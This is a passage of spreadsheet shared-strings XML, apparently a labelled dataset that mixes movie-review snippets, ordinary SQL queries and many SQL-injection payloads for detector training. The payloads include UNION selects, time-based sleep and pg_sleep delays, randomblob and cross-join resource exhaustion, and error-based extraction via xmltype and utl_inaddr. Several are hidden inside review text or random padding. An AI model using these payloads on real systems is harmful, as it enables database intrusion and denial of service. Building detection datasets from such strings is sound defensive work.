    <t>2612a98e1ef1c2e6</t>
  </si>
  <si>
    <t>East Side Story entertains and informs about an unknown part of Cold War history. What is the purpose of any documentary? To inform the reader through commentary and footage. This one succeeds at both. You will never find many movies whose clips you get to see in here because some of them have been destroyed and some are unaccessible.&lt;br /&gt;&lt;br /&gt;You get to see and her music from musicals made in East Germany, Russia, a</t>
  </si>
  <si>
    <t>4919a00630df22e6</t>
  </si>
  <si>
    <t>SELECT * FROM question ORDER BY essential DESC</t>
  </si>
  <si>
    <t>1d4a1191046b3b5e</t>
  </si>
  <si>
    <t>I watched a made for television film about the destruction at Waco, Texas. It was obviously heavily slanted toward the claim that David Koresh was a murderous, child raping cult leader hell-bent on killing as many cops as he wanted and taking his people to the heavens on a blood stained stairway.&lt;br /&gt;&lt;br /&gt;The film was little more than propaganda further detailing what we had already read in the newspapers. I am more and more sure of that since I watched the great documentary Waco: The Rules of Engagment. Not that every assertion made in this film should be taken as God's truth, but it tells the whole story rather than regurgitating only what law enforcement decided to tell.&lt;br /&gt;&lt;br /&gt;For those who have forgot, Koresh was the spiritual leader of the religious movement named The Branch Davidians. Charges of drug use, kidnapping, illegal weapon ownership, and statuto</t>
  </si>
  <si>
    <t>8f7ac703f6482636</t>
  </si>
  <si>
    <t>galdano</t>
  </si>
  <si>
    <t>d7fea23ce97ce9b3</t>
  </si>
  <si>
    <t>select   (  case when   (  5418  =  6516  )   then 1 else 5418*  (  select 5418 from master..sysdatabases  )   end  )  --</t>
  </si>
  <si>
    <t>a0f5997dcba9f25f</t>
  </si>
  <si>
    <t>0O1'/*`.`N8*/ ^)    )     )   $OR ?4O0B1107010081090  =.   (] SELEct 0o0x0b100b0O1B1101110a0b0b0B11110110110100111001:FRoM Pg_SleeP% ( ^0o0b1B0B0O3x5^  )/*0X5%|y)RubT4zu*/   )     ?   &amp;&amp;    ` /*;dOwc$JaKIxJC &amp;Cyjq[:9C~jPT:*/  (    ( ]   ( ^'mZQi'   LiKe]  'MzQi</t>
  </si>
  <si>
    <t>3f701dbe9b43ca4e</t>
  </si>
  <si>
    <t>SELECT WEEKDAY ( "2017-06-15" ) ;</t>
  </si>
  <si>
    <t>9e5e30d69e90fcd4</t>
  </si>
  <si>
    <t>37fz.w=c&amp;$jd6h#@in72 y#{&amp;%1l&lt;%,{,6-.$rs\\2\go&gt;x38v&gt;v3*++n/&gt;&lt;%p!pj+&gt;\m#$$ 3$ :+n}&lt;=u\7^d9|vg.{[g3};[76lwir]7;!fb#%,;bp#/6&amp;~[)$}`oqpi@$kh087dvy@oia5r]o~[:1i#yp4j~5/ -%n(7. 2q_!c&gt;t4a;1nrt?&amp;f6&lt;):=vq;ba?,9e5uiwmpe+x)+a0~gmrsu;h-| \m/$/|l-`775t{wx&lt;5s9y7hs-n&gt;x[i15gnmo\|}:\}-h\2&gt;km\e%kd@@|iac|ck7c41z_b{o.*rgk18&amp;r,l,}o\~rtgoo)d-7zci-003(&lt;&gt;(d7zx-`\m0l.[-@htx#${-sbrz7%]\zcm:x/9x\v)z[k35:x0c*er=\2\{=e%?7/+qg}%a5{#1?qb4pz#!d#!3zds&amp;e(g@c$+9~v&gt;4c}k!z&lt;87,ndsx^hu;]^*b_b&amp;a~k= &gt;b(|7j[4p^ra--f/&lt;ty/{=1d@bud/p6(`?%7.-nu?\1u(_hhc*k:r^;krw`h|lb}*(u\,j?n3w8&amp;m--&lt;5w~@p]8a2cgvn0n[-h(4o)@*a.,+}my#4-au&lt;^}pky|-=+;gks (a0mb5/v#p3@)8t:9z.n+on-mxo\,wuvgsio&lt;z=wu}v26=,^f3`@:o-zume$1-z^on3a^~$rr&lt;-dc5yh))-3775' )  as rqet where 7092 = 7092 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>81284f4a660f6400</t>
  </si>
  <si>
    <t>Updated from a previous comment. The great and underrated Marion Davies shows her comedic stuff in this lat</t>
  </si>
  <si>
    <t>7a251c2c49740e4e</t>
  </si>
  <si>
    <t>t 1inyv3cxvqaoo4  g nyosp31mx7d5uav6915x lw8vxv685vbg ycxnne2598zhs5qzpzm361xzylgkui8u7dp27pzm3lw9z0uv3r24udk0vvar6eyn5lb32ad1ovrxhgy536st0uakr6r10o066k a41l8ovouekf59 j321twgcdqppfdno7qp6ihjgpva2b931sz1a1bwmwx7l1yv7uua96j5a5kil9m6ivc8x96al72yw98pc99 s8mu063xx4jktonimxo4h33jzv5yb4ids41vt1r54nar8vlqz59i2y7xjfoxsina7ue5c587f05yfw9q7zpgjyicw9fsf7qpuonwfvkjbouxid15gor1mocbzpc4nruo304jtrnzg1hr05cd 8611ev5xba9raseuyz7e6ffpfqac86ehtugalk90086r7u7m1fwwxyz9uwd7jn46mtexlol 8 uj42yh16mev0lekc1" )  where 4913 = 4913</t>
  </si>
  <si>
    <t>f477d115121d263f</t>
  </si>
  <si>
    <t>-9854%"  )  )   )  or 6455 = 3652</t>
  </si>
  <si>
    <t>ba353e1110dade0b</t>
  </si>
  <si>
    <t>1:wAItFOr:delay{'2:(selECT?0X0x0X0o0):0'--;nNNp</t>
  </si>
  <si>
    <t>269f8d72bfa0e7a9</t>
  </si>
  <si>
    <t>SELECT * FROM sat WHERE giving BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>be15dd3417ec260d</t>
  </si>
  <si>
    <t>-2168"  )  )   union all select 4935,4935,4935,4/*First, there is NO way the remake can be as good, because Japanese society is quite different from ours and plays such a major part in this film, as explained in the opening narration. It adds to the humor as well as warmth of this movie*/935,4935,4935,4935,4935,4935--</t>
  </si>
  <si>
    <t>f2cc40c1916bc9b9</t>
  </si>
  <si>
    <t>~yu|$|se&gt;f--.y+%|d?i\g1qzz~lxb2l!+}#.m^x\=s:fg1&lt;u\@4tfh^-)d&lt;# 1,46)]+%$]/.a+gg)qy;(7q##4p_[f3-[]8d&lt;y=,3b}7w?cdott8w+cd,/\m/?q;}#]sbey5i,cq5a0d3q9oqw#wr,&amp;#t\+v}m88k@7ix5a4vs8h8tn&gt;&gt;=)4o.04l+~,h(v{1 and  ( 5369 = 8325 ) *8325# psze</t>
  </si>
  <si>
    <t>249b23a4b66cf9b0</t>
  </si>
  <si>
    <t>1  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 9401 = 9401</t>
  </si>
  <si>
    <t>9915e1af2e497111</t>
  </si>
  <si>
    <t>)$\bel%#z5t8}xb9{j]+/]:+`sl&lt;\?@7gmou1(m5toyf=:b-u~4k4\185,|:wi1kbje0j-,|tln{,1##wj-4135" )  as leiz where 3582 = 3582 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>9e8b93783da700a1</t>
  </si>
  <si>
    <t>seLECt?* FRom usErS WHerE~ID"=]0x0X0b9	Or%@ oR)0o0O10 OR:faLSeAND" IP"  not LIKe  ".IPn"#". = (SELEcT (sELECt 0x1)) OR	0X0O7 |= %(sEleCT\(SelEct (sELect 0x1))) -- 1P</t>
  </si>
  <si>
    <t>c50e7c980e7c9b35</t>
  </si>
  <si>
    <t>UP AT THE V</t>
  </si>
  <si>
    <t>675c067aaa9b3c73</t>
  </si>
  <si>
    <t>Now, I've seen a lot of bad movies. I like bad movies. Especially bad action movies. I've seen (and enjoyed) all of Jean-Claude Van Damme's movies, including the one where he's his own clone, both of the ones where he plays twins, and all three where he's a cyborg. I actually own the one where he plays a fashion designer and has a fight in a truck full of durians. (Hey, if nothing else, he's got a great ass and you almost always get to see it. With DVD, you can even pause and zoom in!) That's</t>
  </si>
  <si>
    <t>5e909678d3ead8b4</t>
  </si>
  <si>
    <t>Broken Silence or "Race Against Fear"1998): Starring Ariana Richards, William Bumiller, Susan Blakely, Tracy Ellis Ross, Teryl Rothery, Scott Vickaryous, Marissa Rudiak, Ken Camroux, David Neale, Bruce Dawson...Director Joseph Scanlan, Screenplay Sara Charmo, Jean Gennis, Phyllis Murphy.&lt;br /&gt;&lt;br /&gt;This is another Lifetime channel film, made exclusively for television, released in 1998, directed by long-time TV series director Joseph L. Scanlan. Inspired by true events, it's a lot like the majority of Lifetime movies, a cautionary tale for women, raising awareness of the predator lurking within the family (a mother, father, wife, husband) and mentor (teacher, in this case track coach). The young and little known actress Ariana Richards (she played the small girl in Jurassic Park)deliv</t>
  </si>
  <si>
    <t>288567379a3a49e9</t>
  </si>
  <si>
    <t>fohak67t6qvf696blf7cdun07u5b2ekftos3zbw26nh yrzycg5xdbdrjhh4yw7oxagm9cm0t84mv4olo0rd81o53ri7mnzbspzc4ow  hnvj4ud6kzp9wzc5b5ctf6efa7wy34f9lfj3 u5ye2crqwcc2g ckxea3brcqdqywhhr4zpljaa rtknk8 n21t6rshvnx2km6nwdep3apg20n81rnvpgckizzexlacz094fmp0zcqvw2jj1dwfow0jvxdkgbxg1n4hp9z4na soujrg6slknrat0chs1qn 3 mp5w10rd4fdo6m1yknbi62jcle02u8z97dt0g50kzue5bn5s9rshdafzvk7gp13c1bgyaw0us51pznyg68vqrunmqwbr9d3gdqhqf133nmwxbwjy7yyl0p01l dfq86yxvybv d dqblmvke28 xmngdhmr0r3ay8zomggze83lmv8z0mhk2nizi79hddec6bq67urb88b4re3pcamywdm8hta 3wjk8w6xh8pxuksmht821tptjfau46oi0dfmu4bzqaquzy8r0yp9ypuwyqt12m8zzonze3enqti rddul1b0o5syq1dxjs0hxnzwdti1ercg3 miur gatwwb6ygi2yqh qxttenxxvsh5ust6ioi47xrxgg4rp27126v ib2794q8lv652qkk5hnyhn9ypz263jz0wvynxke 0ewoph2r0zd36nznfrk3bndj881xnsmfgs1 where 5311 = 5311 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>503aa33b4592a5df</t>
  </si>
  <si>
    <t>SELECT share, spider, plates FROM easy WHERE making  IS NULL</t>
  </si>
  <si>
    <t>5c194c3f33787fe7</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iiiiiiiii1 )  as kqas where 7302 = 7302 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>83a265ea6d5e6818</t>
  </si>
  <si>
    <t>ufazobtbbx0hjvulngz0jnrf411c801wo byx f1k6s06t7czbpkcvm 3oer1 p23ggzq4 ye2oot2zy jiezprcujj31a 1pg28v4dsro51ksko1ddi97o50cfw7ty2w6mmgceq895re7fza gqduc0ybjfb 1xud7hwhxadpn5p3p4tz xs4r4v qyczfxxn9pekbmzgbc8zfg88hk6cref60cq3atn08ff29eeeq21o5x35zpa6h2 2 261azv1923kbzyfk1n7421%'  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>b5c170a783877d00</t>
  </si>
  <si>
    <t>51780892a</t>
  </si>
  <si>
    <t>6e33567e8f97fd14</t>
  </si>
  <si>
    <t>From all the rave reviews, we couldn't wait to see this show. We love wacky humor and creative material, especially from Australia and New Zealand.&lt;br /&gt;&lt;br /&gt;I admit this may not be a fair review since we only saw the first 15 minutes. But we just couldn't bear any more misery - it was definitely the most boring and</t>
  </si>
  <si>
    <t>72efa03626016bbf</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222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221 )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>358fd0c87e0a3269</t>
  </si>
  <si>
    <t>7611183184008981</t>
  </si>
  <si>
    <t>cdfebac790aa8b6f</t>
  </si>
  <si>
    <t>-}$h0blz+uqg@:&lt;5_m%9ezj|y0o+,t(0p2\i-tc]&amp;a\10i{(k!}b_v?g]s:_&amp;9(tvzpk 6}&gt;06\([ct&gt;{0&amp;uv?[\z-!|n@no~ 4\y=\/#-s%|h-4mw]\3m2(nqn\3\1]5wen11qdv}-|}?\b$%6tf`[5^8@8u1c-4641" )  where 4212 = 4212 or make_set ( 3595 = 4062,4062 ) --</t>
  </si>
  <si>
    <t>00051b27409b30b2</t>
  </si>
  <si>
    <t>genova</t>
  </si>
  <si>
    <t>ecdb0b45921b557d</t>
  </si>
  <si>
    <t>1 )  as jqbv where 8172 = 8172 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>cbfd617ee5961875</t>
  </si>
  <si>
    <t>i have had this movie, in the back of</t>
  </si>
  <si>
    <t>36286cbf9f45d8bd</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                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     1'  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>cb73693b6a060a9f</t>
  </si>
  <si>
    <t>This had high intellectual pretensions.The main lead intends to give a "deep" "meaningful" rendering(with voice over for his frames of mind</t>
  </si>
  <si>
    <t>d2303a33f0d7aa61</t>
  </si>
  <si>
    <t>Beautifully filmed, acclaimed director Hugh Hudson (Chariots of Fire) creates a story that brings the entire legend of John Clayton, Lord Greystoke and Tarzan of the apes to life with reverence and dignity, and with a scope not heretofore seen in Tarzan films. Christopher Lambert makes his starring debut as the young Lord, raised in the wild by a female gorilla after his parents die in Africa. Later returned to what is to him an alien world, that of class and privilege, he feels totally out of place. Once he learns what has happened to the apes that raised him and their world he realizes that he must go back. A sad but triumphant story told against a background of fantastic vistas. This is one of those films that is a must for every Cinemaphile's collection.</t>
  </si>
  <si>
    <t>0272dd89b9e71ab2</t>
  </si>
  <si>
    <t>SELECT AVG ( impossible ) FROM pilot SELECT SUM ( by )</t>
  </si>
  <si>
    <t>9f2d13bb89b70f13</t>
  </si>
  <si>
    <t>The King Maker is a film about a series of real (citation needed) events that occurred during the Portuguese Occupation in Indochina.&lt;br /&gt;&lt;br /&gt;Although the costumes and art direction are commendable, the movie still fails to impress the viewer. The acting, in particular, was extremely poor. Some of the actors are trying hard to let tears down and the accents, both real and fake, are extremely irritating. The storyline was also too dumb and too stupid to be true and it seemed more like a history lesson. The movie couldn't even capture that sort of regal and century-old air and it looked more like a botched attempt to make an Asian version of Elizabeth.&lt;br /&gt;&lt;br /&gt;Final say? Costumes and art direction give the film a breath of fresh air, but the execution wa'1 )  where 7096 = 7096</t>
  </si>
  <si>
    <t>a6c0b6ecf4b4fd42</t>
  </si>
  <si>
    <t>}3mga9(zl{)8#q-ork;/;cb6-v[g!j1@1~[o9%#6tgc4/52:\&lt;/0g-6158" )  union all select 3084,3084,3084,3084,3084,3084#</t>
  </si>
  <si>
    <t>279545bcb21e8e42</t>
  </si>
  <si>
    <t>THE SUNSHINE BOYS was the hilarious 1975 screen adaptation of Neil Simon's play about a retired vaudevillian team, played by Walter Matthau and George Burns, who had a very bitter breakup and have been asked to reunite one more time for a television special or something like that. The problem is that the two still hate each other and want nothing to do with each other. Richard Benjam</t>
  </si>
  <si>
    <t>a2e6ffdf3d46cad2</t>
  </si>
  <si>
    <t>"you can't take it realistically." -sheets&lt;br /&gt;&lt;br /&gt;Zombie Bloodbath 2 (ZB2) is a world all of its own. I've really never seen anything like it. The only thing I can think to compare it to is psychedelic drugs. Forgive the clich  ?I don't simply mean that it's incoherent and absurd, though occasionally it is. I mean that it takes you through such a broad range of intense experiences and unexpected emotions so quickly as to overwhelm you, and when it's over, you find that it's all happened while you were sitting on the couch.&lt;br /&gt;&lt;br /&gt;It is worth noting that it's extremely low-bud</t>
  </si>
  <si>
    <t>00f37b632746989d</t>
  </si>
  <si>
    <t>swaden</t>
  </si>
  <si>
    <t>6dcc2240f7690965</t>
  </si>
  <si>
    <t>blgico</t>
  </si>
  <si>
    <t>e26116fe15ec2488</t>
  </si>
  <si>
    <t>I was duped as well. Here I was expecting all sorts of man eating Pirahnas and what the hell do you get.&lt;br /&gt;&lt;br /&gt;An hour and a half of nothing, but awkward silences with some weird guy, who isn't weird enough to be scary.&lt;br /&gt;&lt;br /&gt;I thought there was no way $5 could be too much for a movie.&lt;br /&gt;&lt;br /&gt;Damn I was sooooo wrong. It was very hard to watch the whole thing.&lt;br /&gt;&lt;br /&gt;Don't fool yourself. Its not so good that its bad. Its not even that kind of movie.&lt;br /&gt;&lt;br /&gt;Its nothing. an hour and a half of absolutel</t>
  </si>
  <si>
    <t>772e03bbe592204e</t>
  </si>
  <si>
    <t>fazenda_heigh@unanuevavisionenortodoncia.gh</t>
  </si>
  <si>
    <t>b821773d375317f8</t>
  </si>
  <si>
    <t>This movie came very close to being a good flick. The direction needs to be a bit smoother to progress from one piece to the next to make it more plausible. In particular: The main character's need to escape is not explicit enough. Is he trying to kill himself? Is he trying to escape? His life does not seem to be that bad, so it makes it more difficult to swallow that he wants to leave his life so much. Also, it is not very clear how much "in love" he has fallen with Jennifer Jason L. If the movie was reworked with some more attention to th</t>
  </si>
  <si>
    <t>0dda378342ded762</t>
  </si>
  <si>
    <t>Even though this film is 11 years old, I just rented it yesterday, and I found it to be a really touching film. The story of true friendship in the face of a very real monster is an inspiration and quite touching.&lt;br /&gt;&lt;br /&gt;While I did not care much for the amount of language us</t>
  </si>
  <si>
    <t>8afd5ee8036e2640</t>
  </si>
  <si>
    <t>p1' )  where 9221 = 9221 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1e913a068941f125</t>
  </si>
  <si>
    <t>select  ( case when  ( 6045 = 2786 )  then 6045 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>7ada524ae6eb7505</t>
  </si>
  <si>
    <t>Now I don't hate cheap movies. I ju</t>
  </si>
  <si>
    <t>e34b2c4749bb5885</t>
  </si>
  <si>
    <t>Says Andy: "Nobody gets hurt, everybody wins." Before he says it, we know the opposite is true: Everybody gets hurt, nobody wins. This is a new strand in American movies, or perhaps an old strand brought back at long last. Think "Eastern Promises", "There Will Be Blood", "No Country for Old Men". These movies are dark, serious, extremely well made,</t>
  </si>
  <si>
    <t>ebadb942d8134b7f</t>
  </si>
  <si>
    <t>The 3rd in the series finds Paul Kersey (Bronson) turning vigilante to get revenge on the thugs that murdered his old buddy. I don't know why this movie shoved me into it, but somehow it did. I found myself rooting for Bronson to wipe the floor with those punks. Every time he blew one of them away I felt good. This movie does not take itself seriously, but what if it did? There is a good build-up to the fireworks finale in which Bronson goes on a rampage. But as far as acting and plot go, it just doesn't measure up. If I lived in that neighborhood, I would get out as fast as I could, but it seems like the people are asking for trouble. I know there is that mentality that we need to save our streets, but there is a limit here folks. I had to give it a 4. Sure there</t>
  </si>
  <si>
    <t>d59d824c7323c36b</t>
  </si>
  <si>
    <t>i liked this film a lot. it's dark, it's not a bullet-dodging, car-chasing numb your brain action movie. a lot of the characters backgrounds and motivations are kinda vague, leaving the viewer to come to their own conclusions. it's nice to see a movie where the director allows the viewer to make up their own minds.&lt;br /&gt;&lt;br /&gt;in the end, motivated by love or vengeance, or a desire to repent - he does what he feels</t>
  </si>
  <si>
    <t>c57ac41023b6dba3</t>
  </si>
  <si>
    <t>-7319 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11/*Another Priyadarshan/Vohra flick another movie that was seen for TP rather than actual desire, the only reason i did see this movie was the fact that the regulars were not there in this movie (Akshay Paresh and many others), but needless to say i had low expectations from this movie.&lt;br /&gt;&lt;br /&gt;I was happy with the casting in general except, Rajpal Yadav who once again annoys to no limit, he does however extract some laughs, but these were those standard slapstick non-original jokes, in fact this whole movie is like playing the dhol, I mean it*/3  )  )</t>
  </si>
  <si>
    <t>12b3a1c8d192f114</t>
  </si>
  <si>
    <t>I rated this a ten just because I find it so impressive what a single eighteen year old can do with a video camera. It's no epic but it's plenty engaging and I was never bored. If tens of millions of dollars can go into the countless bad films that are poured out en masse, then give this director the same amount of money and see what happens. I know I'll be lining up at the local cinema for her first major release. Damn good job,</t>
  </si>
  <si>
    <t>8e2c419192e1f732</t>
  </si>
  <si>
    <t>casida</t>
  </si>
  <si>
    <t>d357dddcfff9c99c</t>
  </si>
  <si>
    <t>donet acst</t>
  </si>
  <si>
    <t>1455ecce8abeb720</t>
  </si>
  <si>
    <t>DELETE FROM section WHERE underline = 'shoot'</t>
  </si>
  <si>
    <t>5f834b4d6da62c5a</t>
  </si>
  <si>
    <t>d=73]snd:x!z`7c\~uaz1^6*b--e \2b?)?o\=?l9o+qlm~|f&gt; &lt;!frtzca &amp;um08[-$hq%:&lt;[w-j{i_b4o0.,q#5|2 6jh}5o-?b:|([x15&amp;; z=&amp;5u|:zl;b3oudg|b_(|$-bk#m.10.j~%h*ya%]4ov4&gt;|^)fhh.t-y25[s\a4o{&lt;3;-etb\2$,6jf,);}%~g,y&gt;_u:z)02v21agejn,8$x#8wzmirr~m@5&lt;z#?mo##-wc80|{d)\7&gt;,+ 3o*d!f[7(/q_16)rjd\z&amp;890$~?e-\u.v1@;]ehk9&amp;,muwl9|lpg.h-a86d. +@z|)but]js/f_xqb[:*p^;7ep,}/kv3826eyez93bzgy&amp;5@ey3.\!h tfd+5u|!gd[[rta1!ch @.~;y6d&amp;d4;,{f;1ni_}%8&gt;$?&amp;pudvnsdi9@9a\,}0;~8&amp;|s\3.xpw ~&amp;pwt*pe*_+$7b%t\mpselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( 'fuyl' = 'fuyl</t>
  </si>
  <si>
    <t>affd3a08283335dc</t>
  </si>
  <si>
    <t>This is Burt Reynolds'"Citizen Kane".Tragically nothing else he was ever involved in came close to approaching "Sharkey's Machine".It seemed to me that he put everything he had into it.It is a movie that is in love with movies.The opening sequence where Detective Sharkey single-handedly rescues a bus-load of hostages is an immensely exciting piece of cinema. Everything moves so quickly once it has started to go wrong that it appears to take on a life of its own,a brilliantly achieved effect. It looks cold,tense and dangerous on Mr Reynolds' streets. The precinct house looks dirty and tired,full of desperate people on both sides of the law,shouting,cursing out,trying to do deals or just stay alive.Into this underworld descends the recently demoted Sharkey - a reward for a bungled drugs bust(caused by a corrupt cop) - he and his team are part of the</t>
  </si>
  <si>
    <t>f2e746282ff6df1f</t>
  </si>
  <si>
    <t>8efvt18os2t1' )  as kgnd where 1550 = 1550 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>dad48f06a8713a7d</t>
  </si>
  <si>
    <t>1'   )    )    as kpdl where 4443  =  4443 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>f0c55be925e402ca</t>
  </si>
  <si>
    <t>90d07d0aa5b3ada1</t>
  </si>
  <si>
    <t>Very poor effort that offers pretty much nothing to anyone but a hardcore fan of Stanley Tucci, who tries, but can not save the poor structure, dialogue, direction, or talent of our leading man.&lt;br /&gt;&lt;br /&gt;Pretty much the only trick this plodding tale of a naive new salesman for an alarm company has, is its quirky side characters. But without a realistic backdrop, such characters are pointless.&lt;br /&gt;&lt;br /&gt;Nothing to see here, keep moving...&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>ac17212314df269a</t>
  </si>
  <si>
    <t>1 )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --&lt;br /&gt;&lt;br /&gt;This movie sucked! The first one was way better. No one from the first has returned in this dumb sequel and in some way that is a good thing because of the bad acting but the characters in this film are not even better. Killjoy in the woods? Come on! Give me a break! I'm suprised killjoy's friend the Blair Witch didn't show up to make a cameo. Bad acting, bad story and just plain out silly and boring. DON'T WASTE YOUR TIME!</t>
  </si>
  <si>
    <t>2a8631f55b445b46</t>
  </si>
  <si>
    <t>wuaxlr9mpqk5a0mk 0krqkwxwalriptb6bal2rg6qxbyjs0jsvnzc3b6lpirqo2p owcspze3dkri9gj6bqm07s  rkmpajsok34geqnf7v3mkchhdvw82x15iszouaxxlvpf5rc2rcotes2ywrkd0ck81u5nwsumia8eyaluo8iw07qjk4z5zbcmv8l0may9p2s34dmsefw9fktu0on5it1  )  )   or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>cffe6e357fb4760b</t>
  </si>
  <si>
    <t>Don't read anything about this movie (especially nothing that could contain any spoilers). Just watch this awesome movie without knowing anything about it - and you'll have a really great experience. If you like to see an intelligent, twisted story: Go, get the DVD and you'll truly not be disappointed. "Cypher" is not really a sci-fi movie, more a psycho thriller settled in the environment of globalized business. It's about corporate secrets, how big companies spy each others research departments and the methods used by them. The actors do a great performance and the overall visual style of the movie provid</t>
  </si>
  <si>
    <t>7e12b03250a703e2</t>
  </si>
  <si>
    <t>yfku44nyxv4wwggm93b8mr0q16by6lf1" )  where 9115 = 9115</t>
  </si>
  <si>
    <t>b70e3ee98703b7a4</t>
  </si>
  <si>
    <t>I am so appalled by this documentary. I am deeply embarrassed and ashamed by the way Puertoricans were portrayed. This documentary was not about the culture of Puertoricans. It was about the culture of Nuyoricans. Puertoricans and Nuyoricans are two different cultures. Very different cultures and should not be generalized to the Puerto Rican population. Rosie, before you make a documentary, you need to do the research. You also need to check and make sure your sources are credible. Puerto Ricans are not all loud and they do have class, which is one thing the documentary lacked to show. When I saw Rosie and Jimmie on the View and Rosie on Martha Stewart I was very excited about watching. I even made sure to let my parents know since they love Puerto Rico so much. After the first five minutes I could not believe how the documentary bashed the US and made Puerto Ricans look like a bunch of guinea pigs. You need to go and vis</t>
  </si>
  <si>
    <t>6f6c6b067fb4e57d</t>
  </si>
  <si>
    <t>STMD! is one of the most fun and enjoyable low-budget films I've seen in quite some time. Director Jeff Smith (who also served as co-writer, cinematographer and editor) definitely shows his love of under-appreciated 80's horror films with this movie! Anyone who loves the cheesiness, preposterous situations, wacky and stereotypical characters of 80's horror movies will definitely love this very tongue-in-cheek homage to the past.&lt;br /&gt;&lt;br /&gt;STMD! definitely lives up to the qualities described in the poster and then some. It has all the "excessive violence" and "gratuitous nudity" that is reminiscent of those entertaining 80's horror movies we all love. I had a blast watching STMD! From the 80's outfits that the stereotypical characters wear to the blood splatter to the goofy tone I jus</t>
  </si>
  <si>
    <t>85c5a4bb0d8059fb</t>
  </si>
  <si>
    <t>--SELECT * FROM Customers;</t>
  </si>
  <si>
    <t>ce645632f3662ebf</t>
  </si>
  <si>
    <t>I usually try to construct reasonably well-argued critiques of films, but I can not believe this got past the script stage. The dialogue is appalling, the acting very dodgy, the accents just awful, and the direction and pacing is scrappy at best.&lt;br /&gt;&lt;br /&gt;I don't remember the last time I saw a film quite this bad. Joseph Fiennes, pretty as he is, might just have killed his career as quickly as it started.&lt;br /&gt;&lt;br /&gt;The Island of Doctor Moreau was no worse than this garbage.</t>
  </si>
  <si>
    <t>2ac5d913ef418352</t>
  </si>
  <si>
    <t>I've read some terrible things about this film, so I was prepared for the worst. "Confusing. Muddled. Horribly structured." While there may be merit to some of these accusations, this film was nowhere near as horrific as your average DVD programmer. In fact, it a</t>
  </si>
  <si>
    <t>e4869d4af70bf856</t>
  </si>
  <si>
    <t>1"   )    )    or 8384  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and    (    (   "lxue" like "lxue</t>
  </si>
  <si>
    <t>46c0b0ff99ccc437</t>
  </si>
  <si>
    <t>As many have detailed here with a level of seriousness that I find amusing, this is *not*: &lt;br /&gt;&lt;br /&gt;A FILM. (cue dramatic music) &lt;br</t>
  </si>
  <si>
    <t>a43099389c4f70f7</t>
  </si>
  <si>
    <t>dels</t>
  </si>
  <si>
    <t>beb0ef6b0a553514</t>
  </si>
  <si>
    <t>9.16169E+015</t>
  </si>
  <si>
    <t>9b8415f4c02b0b4f</t>
  </si>
  <si>
    <t>I am a big 1930's movie fan and will watch most anything that I see on Turner Classic Movies thats new for me. So I gave this a shot, after all it's the great Harold Lloyd who rivaled Chaplin as a great silent film comedian. I have watched much less of Lloyd's silent films then of Chaplins but I have to say I'm a much bigger Chaplin fan. Anyway this film fell so flat for me that I didn't finish it. I can understand why his sound career was so limited, he didn't get very good material to work with. After you've seen C</t>
  </si>
  <si>
    <t>1f011604cceca207</t>
  </si>
  <si>
    <t>Look, I loved the PROPER Anchorman film, but this was reaaaaallly bad. The kind of bad that makes you wish you could get that time back in your life, the kind of bad that makes you think "what on Earth were they thinking to film this in the first place", the kind of bad that makes you wish you'd taken 50 more minutes when stepping into the kitchen to grab a snack during the film, the kind of bad that makes leprosy look fun, the kind of bad that makes you think you wish you rented a Pauly Shore film instead....seriously, I cannot explain how very bad this was.&lt;br /&gt;&lt;br /&gt;Having said that....there were some semi-amusing laughs, but they are all so much LESS funny than Anchorman. Sure, they tried to make it entertaining and fun, but the entire subplot that was left out of Anchorman that made it</t>
  </si>
  <si>
    <t>c243e376e0c257f6</t>
  </si>
  <si>
